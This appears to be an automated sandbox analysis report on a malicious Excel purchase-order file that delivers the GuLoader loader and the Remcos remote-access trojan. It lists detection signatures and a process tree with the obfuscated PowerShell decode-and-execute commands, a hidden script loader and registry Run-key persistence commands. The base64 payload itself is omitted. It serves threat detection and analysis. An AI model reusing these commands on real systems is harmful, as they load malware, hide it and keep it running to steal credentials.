Windows Analysis Report: PO 11001 .xls
Overview
General Information
Detection | Score | Range | Whitelisted | Confidence |
---|---|---|---|---|
Remcos, GuLoader | 100 | 0 - 100 | false | 100% |
Signatures
Detected Remcos RAT
Detected unpacking (changes PE section rights)
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected GuLoader
Yara detected Remcos RAT
Document exploit detected (process start blacklist hit)
Excel sheet contains many unusual embedded objects
Installs new ROOT certificates
Machine Learning detection for sample
Maps a DLL or memory area into another process
Microsoft Office drops suspicious files
PowerShell case anomaly found
Powershell drops PE file
Sample uses process hollowing technique
Searches for Windows Mail specific files
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: File With Uncommon Extension Created By An Office Application
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious Microsoft Office Child Process
Sigma detected: System File Execution Location Anomaly
Suspicious command line found
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Writes to foreign memory regions
Abnormal high CPU Usage
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Compiles C# or VB.Net code
Contains functionality to read data from the clipboard
Contains functionality to call native functions
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Document contains embedded VBA macros
Document embeds suspicious OLE2 link
Downloads executable code via HTTP
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Direct Autorun Keys Modification
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Excel Network Connections
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Sigma detected: Suspicious Office Outbound Connections
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found; this is very uncommon (may be encrypted or packed)
Classification
- System is w7x64
- EXCEL.EXE (PID: 3660 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
- mshta.exe (PID: 3924 cmdline: C:\Windows\System32\mshta.exe -Embedding MD5: 95828D670CFD3B16EE188168E083C3C5)
- cmd.exe (PID: 4008 cmdline: "C:\Windows\system32\cmd.exe" "/C PoWeRSHElL -Ex BypaSs -nOp -W 1 -c DeVIcEcREdENTiaLdEplOYMENT.eXe ; iEx( $(ieX('[SYsTeM.TExT.ENcODINg]'+[Char]0X3a+[Char]0X3A+'Utf8.getstRiNg([SYstEm.coNvErt]'+[chAR]58+[cHar]58+'FroMBAsE64sTrIng('+[chaR]34+'[base64 payload omitted]'+[cHAR]0x22+'))')))" MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
- powershell.exe (PID: 4032 cmdline: PoWeRSHElL -Ex BypaSs -nOp -W 1 -c DeVIcEcREdENTiaLdEplOYMENT.eXe ; iEx($(ieX('[SYsTeM.TExT.ENcODINg]'+[Char]0X3a+[Char]0X3A+'Utf8.getstRiNg([SYstEm.coNvErt]'+[chAR]58+[cHar]58+'FroMBAsE64sTrIng('+[chaR]34+'[base64 payload omitted]'+[cHAR]0x22+'))')))" MD5: A575A7610E5F003CC36DF39E07C4BA7D)
- csc.exe (PID: 3152 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sm41lsyu\sm41lsyu.cmdline" MD5: 23EE3D381CFE3B9F6229483E2CE2F9E1)
- cvtres.exe (PID: 3168 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA499.tmp" "c:\Users\user\AppData\Local\Temp\sm41lsyu\CSCE0CED41DA99B458392766F6BC82F0D5.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
- dllhost.exe (PID: 3308 cmdline: "C:\Users\user\AppData\Roaming\dllhost.exe" MD5: 450228D72F9F726B645C55BBBC6DB905)
- powershell.exe (PID: 3388 cmdline: "powershell.exe" -windowstyle hidden "$krjning=Get-Content -Raw 'C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea\Aerognosy.Res';$Lukewarmly95=$krjning.SubString(5322,3);.$Lukewarmly95($krjning)" MD5: EB32C070E658937AA9FA9F3AE629B2B8)
- Vaccinerende.exe (PID: 924 cmdline: "C:\Users\user\AppData\Local\Temp\Vaccinerende.exe" MD5: 450228D72F9F726B645C55BBBC6DB905)
- cmd.exe (PID: 1908 cmdline: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Chivey57" /t REG_EXPAND_SZ /d "%Misbehavers% -windowstyle 1 $Frligheden=(gp -Path 'HKCU:\Software\Roscoelite\').Aftvttedes;%Misbehavers% ($Frligheden)" MD5: AD7B9C14083B52BC532FBA5948342B98)
- reg.exe (PID: 3084 cmdline: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Chivey57" /t REG_EXPAND_SZ /d "%Misbehavers% -windowstyle 1 $Frligheden=(gp -Path 'HKCU:\Software\Roscoelite\').Aftvttedes;%Misbehavers% ($Frligheden)" MD5: D69A9ABBB0D795F21995C2F48C1EB560)
- Vaccinerende.exe (PID: 4028 cmdline: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\uufpqcznfpbrpkbrchvwvbbgmplrtlta" MD5: 450228D72F9F726B645C55BBBC6DB905)
- Vaccinerende.exe (PID: 4008 cmdline: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\wwta" MD5: 450228D72F9F726B645C55BBBC6DB905)
- Vaccinerende.exe (PID: 2740 cmdline: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\hrysrnv" MD5: 450228D72F9F726B645C55BBBC6DB905)
- Vaccinerende.exe (PID: 1308 cmdline: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\jypyihgkg" MD5: 450228D72F9F726B645C55BBBC6DB905)
- Vaccinerende.exe (PID: 2192 cmdline: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\tsdrjareurci" MD5: 450228D72F9F726B645C55BBBC6DB905)
- Vaccinerende.exe (PID: 3596 cmdline: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\wvibksbfizuvagm" MD5: 450228D72F9F726B645C55BBBC6DB905)
- Vaccinerende.exe (PID: 2420 cmdline: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\iwmakfxbvkkvnuhajheo" MD5: 450228D72F9F726B645C55BBBC6DB905)
- Vaccinerende.exe (PID: 3920 cmdline: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\krsslxicrscipavesrrqbfdw" MD5: 450228D72F9F726B645C55BBBC6DB905)
- Vaccinerende.exe (PID: 2512 cmdline: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\vtxdlqtwfaunaojibclrekqfvdn" MD5: 450228D72F9F726B645C55BBBC6DB905)
- Vaccinerende.exe (PID: 2992 cmdline: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\myrqksteqvbcbpuimnlztpdvy" MD5: 450228D72F9F726B645C55BBBC6DB905)
- Vaccinerende.exe (PID: 3472 cmdline: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\xtwidkeyedthlwimexyaecymzxube" MD5: 450228D72F9F726B645C55BBBC6DB905)
- Vaccinerende.exe (PID: 1872 cmdline: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\zvbbddpzsllmnceqnitchhsvidlcgnnv" MD5: 450228D72F9F726B645C55BBBC6DB905)
- Vaccinerende.exe (PID: 332 cmdline: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\jghbahqihjysxfkijlbzkstdovyth" MD5: 450228D72F9F726B645C55BBBC6DB905)
- Vaccinerende.exe (PID: 1876 cmdline: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\tamubzacvrqfilguawnanwnuwchuixxt" MD5: 450228D72F9F726B645C55BBBC6DB905)
- Vaccinerende.exe (PID: 1820 cmdline: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\dcam" MD5: 450228D72F9F726B645C55BBBC6DB905)
- Vaccinerende.exe (PID: 1908 cmdline: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\ctsuyeuksgddrommozvfphobcmulr" MD5: 450228D72F9F726B645C55BBBC6DB905)
- mshta.exe (PID: 1852 cmdline: C:\Windows\System32\mshta.exe -Embedding MD5: 95828D670CFD3B16EE188168E083C3C5)
- cmd.exe (PID: 1392 cmdline: "C:\Windows\system32\cmd.exe" "/C PoWeRSHElL -Ex BypaSs -nOp -W 1 -c DeVIcEcREdENTiaLdEplOYMENT.eXe ; iEx( $(ieX('[SYsTeM.TExT.ENcODINg]'+[Char]0X3a+[Char]0X3A+'Utf8.getstRiNg([SYstEm.coNvErt]'+[chAR]58+[cHar]58+'FroMBAsE64sTrIng('+[chaR]34+'[base64 payload omitted]'+[cHAR]0x22+'))')))" MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
- powershell.exe (PID: 2372 cmdline: PoWeRSHElL -Ex BypaSs -nOp -W 1 -c DeVIcEcREdENTiaLdEplOYMENT.eXe ; iEx($(ieX('[SYsTeM.TExT.ENcODINg]'+[Char]0X3a+[Char]0X3A+'Utf8.getstRiNg([SYstEm.coNvErt]'+[chAR]58+[cHar]58+'FroMBAsE64sTrIng('+[chaR]34+'[base64 payload omitted]'+[cHAR]0x22+'))')))" MD5: A575A7610E5F003CC36DF39E07C4BA7D)
- csc.exe (PID: 3584 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\r4gn3nq1\r4gn3nq1.cmdline" MD5: 23EE3D381CFE3B9F6229483E2CE2F9E1)
- cvtres.exe (PID: 3424 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESF72C.tmp" "c:\Users\user\AppData\Local\Temp\r4gn3nq1\CSCA7279739985342FFA8B6946FD4222CB8.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
- dllhost.exe (PID: 1536 cmdline: "C:\Users\user\AppData\Roaming\dllhost.exe" MD5: 450228D72F9F726B645C55BBBC6DB905)
- powershell.exe (PID: 2596 cmdline: "powershell.exe" -windowstyle hidden "$krjning=Get-Content -Raw 'C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea\Aerognosy.Res';$Lukewarmly95=$krjning.SubString(5322,3);.$Lukewarmly95($krjning)" MD5: EB32C070E658937AA9FA9F3AE629B2B8)
- Vaccinerende.exe (PID: 3116 cmdline: "C:\Users\user\AppData\Local\Temp\Vaccinerende.exe" MD5: 450228D72F9F726B645C55BBBC6DB905)
- powershell.exe (PID: 3852 cmdline: "C:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -windowstyle 1 $Frligheden=(gp -Path 'HKCU:\Software\Roscoelite\').Aftvttedes;c:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe ($Frligheden) MD5: EB32C070E658937AA9FA9F3AE629B2B8)
- powershell.exe (PID: 1848 cmdline: "C:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "$krjning=Get-Content -Raw 'C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea\Aerognosy.Res';$Lukewarmly95=$krjning.SubString(5322,3);.$Lukewarmly95($krjning)" MD5: EB32C070E658937AA9FA9F3AE629B2B8)
- powershell.exe (PID: 1504 cmdline: "C:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -windowstyle 1 $Frligheden=(gp -Path 'HKCU:\Software\Roscoelite\').Aftvttedes;c:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe ($Frligheden) MD5: EB32C070E658937AA9FA9F3AE629B2B8)
- powershell.exe (PID: 3752 cmdline: "C:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "$krjning=Get-Content -Raw 'C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea\Aerognosy.Res';$Lukewarmly95=$krjning.SubString(5322,3);.$Lukewarmly95($krjning)" MD5: EB32C070E658937AA9FA9F3AE629B2B8)
- cleanup
Name | Description | Attribution | Blogpost URLs | Link |
---|---|---|---|---|
Remcos, RemcosRAT | Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers. Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity. | | | |
CloudEyE, GuLoader | CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored. | No Attribution | | |
No configs have been found.
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security | |
| | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security | |
| | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security | |
| | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security | |
System Summary

| Source | Author |
|---|---|
| | Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule), Nasreddine Bencherchali (Nextron Systems) |
| | Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems) |
| | Michael Haag |